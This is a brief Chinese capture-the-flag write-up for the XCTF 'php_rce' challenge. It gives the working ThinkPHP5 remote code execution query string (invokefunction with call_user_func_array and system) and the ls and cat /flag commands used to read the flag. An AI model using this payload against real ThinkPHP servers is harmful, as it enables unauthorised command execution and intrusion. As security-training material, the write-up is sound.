攻防世界系列:php_rce
1.打開題目
看到這個還是很懵的,點開任意連接都是真實的場景。
2.ThinkPHP5,這里我們需要知道它存在
遠程代碼執行的漏洞。
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)
ls查看
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
上一級 ls ../
根目錄下 ls /
發現 flag打開flag cat /flag
